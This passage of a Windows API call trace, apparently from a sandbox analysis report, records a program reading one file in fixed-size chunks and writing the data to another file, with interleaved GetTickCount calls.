SendMessageA (hWnd=0x302f8, Msg=0x1007, wParam=0x0, lParam=0x2d6fd70) returned 0x11 [0272.644] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0x11, lParam=0x0) returned 0x1 [0272.646] SetFilePointer (in: hFile=0x1e0, lDistanceToMove=66696, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10488 [0272.646] ReadFile (in: hFile=0x1e0, lpBuffer=0x2d6fdac, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x2d6fdac*, lpNumberOfBytesRead=0x2d6fd28*=0x4, lpOverlapped=0x0) returned 1 [0272.646] GetTickCount () returned 0x1d612ca [0272.646] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.648] GetTickCount () returned 0x1d612d9 [0272.648] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.649] GetTickCount () returned 0x1d612d9 [0272.649] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x5a7, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x5a7, lpOverlapped=0x0) returned 1 [0272.650] GetTickCount () returned 0x1d612d9 [0272.650] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.650] GetTickCount () returned 0x1d612d9 [0272.650] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x6ee1, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x6ee1, lpOverlapped=0x0) returned 1 [0272.651] GetTickCount () returned 0x1d612d9 [0272.651] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.651] GetTickCount () returned 0x1d612d9 [0272.651] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.652] GetTickCount () returned 0x1d612d9 [0272.652] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0xb5e, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0xb5e, lpOverlapped=0x0) returned 1 [0272.652] GetTickCount () returned 0x1d612d9 [0272.652] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.653] GetTickCount () returned 0x1d612d9 [0272.653] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.653] GetTickCount () returned 0x1d612d9 [0272.653] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x6687, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x6687, lpOverlapped=0x0) returned 1 [0272.654] GetTickCount () returned 0x1d612d9 [0272.654] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.654] GetTickCount () returned 0x1d612d9 [0272.654] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x6b79, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x6b79, lpOverlapped=0x0) returned 1 [0272.655] GetTickCount () returned 0x1d612d9 [0272.655] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.655] GetTickCount () returned 0x1d612d9 [0272.655] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x7b16, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x7b16, lpOverlapped=0x0) returned 1 [0272.656] GetTickCount () returned 0x1d612d9 [0272.656] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.657] GetTickCount () returned 0x1d612d9 [0272.657] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.657] GetTickCount () returned 0x1d612d9 [0272.657] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0xc5b, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0xc5b, lpOverlapped=0x0) returned 1 [0272.657] GetTickCount () returned 0x1d612d9 [0272.657] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.658] GetTickCount () returned 0x1d612d9 [0272.658] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.659] GetTickCount () returned 0x1d612d9 [0272.659] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0xd6b, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0xd6b, lpOverlapped=0x0) returned 1 [0272.660] GetTickCount () returned 0x1d612d9 [0272.660] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.660] GetTickCount () returned 0x1d612d9 [0272.660] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.661] GetTickCount () returned 0x1d612d9 [0272.661] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x1bb7, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x1bb7, lpOverlapped=0x0) returned 1 [0272.661] GetTickCount () returned 0x1d612d9 [0272.661] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.662] GetTickCount () returned 0x1d612d9 [0272.662] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.662] GetTickCount () returned 0x1d612d9 [0272.662] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x60b6, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x60b6, lpOverlapped=0x0) returned 1 [0272.663] GetTickCount () returned 0x1d612d9 [0272.663] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.663] GetTickCount () returned 0x1d612e9 [0272.663] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.664] GetTickCount () returned 0x1d612e9 [0272.664] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x939, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x939, lpOverlapped=0x0) returned 1 [0272.664] GetTickCount () returned 0x1d612e9 [0272.664] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.665] GetTickCount () returned 0x1d612e9 [0272.665] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.666] GetTickCount () returned 0x1d612e9 [0272.666] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x44b4, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x44b4, lpOverlapped=0x0) returned 1 [0272.666] GetTickCount () returned 0x1d612e9 [0272.667] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.667] GetTickCount () returned 0x1d612e9 [0272.667] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.668] GetTickCount () returned 0x1d612e9 [0272.668] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x159f, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x159f, lpOverlapped=0x0) returned 1 [0272.668] GetTickCount () returned 0x1d612e9 [0272.668] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.669] GetTickCount () returned 0x1d612e9 [0272.669] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.670] GetTickCount () returned 0x1d612e9 [0272.670] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x71c8, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x71c8, lpOverlapped=0x0) returned 1 [0272.670] GetTickCount () returned 0x1d612e9 [0272.670] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.671] GetTickCount () returned 0x1d612e9 [0272.671] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.672] GetTickCount () returned 0x1d612e9 [0272.672] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x542c, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x542c, lpOverlapped=0x0) returned 1 [0272.672] GetTickCount () returned 0x1d612e9 [0272.672] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.673] GetTickCount () returned 0x1d612e9 [0272.673] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.674] GetTickCount () returned 0x1d612e9 [0272.674] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x790c, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x790c, lpOverlapped=0x0) returned 1 [0272.674] GetTickCount () returned 0x1d612e9 [0272.674] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.675] GetTickCount () returned 0x1d612e9 [0272.675] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.676] GetTickCount () returned 0x1d612e9 [0272.676] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x71e7, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x71e7, lpOverlapped=0x0) returned 1 [0272.677] GetTickCount () returned 0x1d612e9 [0272.677] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.677] GetTickCount () returned 0x1d612e9 [0272.677] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.678] GetTickCount () returned 0x1d612e9 [0272.678] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x1da0, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x1da0, lpOverlapped=0x0) returned 1 [0272.679] GetTickCount () returned 0x1d612f9 [0272.679] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.680] GetTickCount () returned 0x1d612f9 [0272.680] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.680] GetTickCount () returned 0x1d612f9 [0272.680] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0xa53, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0xa53, lpOverlapped=0x0) returned 1 [0272.680] GetTickCount () returned 0x1d612f9 [0272.680] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.681] GetTickCount () returned 0x1d612f9 [0272.681] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.681] GetTickCount () returned 0x1d612f9 [0272.681] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0xee1, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0xee1, lpOverlapped=0x0) returned 1 [0272.682] GetTickCount () returned 0x1d612f9 [0272.682] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.682] GetTickCount () returned 0x1d612f9 [0272.682] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.683] GetTickCount () returned 0x1d612f9 [0272.683] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x155a, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x155a, lpOverlapped=0x0) returned 1 [0272.683] GetTickCount () returned 0x1d612f9 [0272.683] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.684] GetTickCount () returned 0x1d612f9 [0272.684] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.684] GetTickCount () returned 0x1d612f9 [0272.684] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.685] GetTickCount () returned 0x1d612f9 [0272.685] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x2b3a, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x2b3a, lpOverlapped=0x0) returned 1 [0272.685] GetTickCount () returned 0x1d612f9 [0272.685] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.686] GetTickCount () returned 0x1d612f9 [0272.686] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.686] GetTickCount () returned 0x1d612f9 [0272.686] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x3b86, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x3b86, lpOverlapped=0x0) returned 1 [0272.687] GetTickCount () returned 0x1d612f9 [0272.687] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.687] GetTickCount () returned 0x1d612f9 [0272.687] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.692] GetTickCount () returned 0x1d612f9 [0272.692] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x1946, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x1946, lpOverlapped=0x0) returned 1 [0272.692] GetTickCount () returned 0x1d612f9 [0272.692] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.693] GetTickCount () returned 0x1d612f9 [0272.693] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.694] GetTickCount () returned 0x1d612f9 [0272.694] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x1d55, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x1d55, lpOverlapped=0x0) returned 1 [0272.694] GetTickCount () returned 0x1d612f9 [0272.694] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.694] GetTickCount () returned 0x1d61308 [0272.694] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.695] GetTickCount () returned 0x1d61308 [0272.695] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x34ff, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x34ff, lpOverlapped=0x0) returned 1 [0272.695] GetTickCount () returned 0x1d61308 [0272.695] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.696] GetTickCount () returned 0x1d61308 [0272.696] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.697] GetTickCount () returned 0x1d61308 [0272.697] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0xa58, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0xa58, lpOverlapped=0x0) returned 1 [0272.700] GetTickCount () returned 0x1d61308 [0272.700] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.701] GetTickCount () returned 0x1d61308 [0272.701] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x7b06, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x7b06, lpOverlapped=0x0) returned 1 [0272.702] GetTickCount () returned 0x1d61308 [0272.702] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.702] GetTickCount () returned 0x1d61308 [0272.702] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.703] GetTickCount () returned 0x1d61308 [0272.703] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0xdd5, 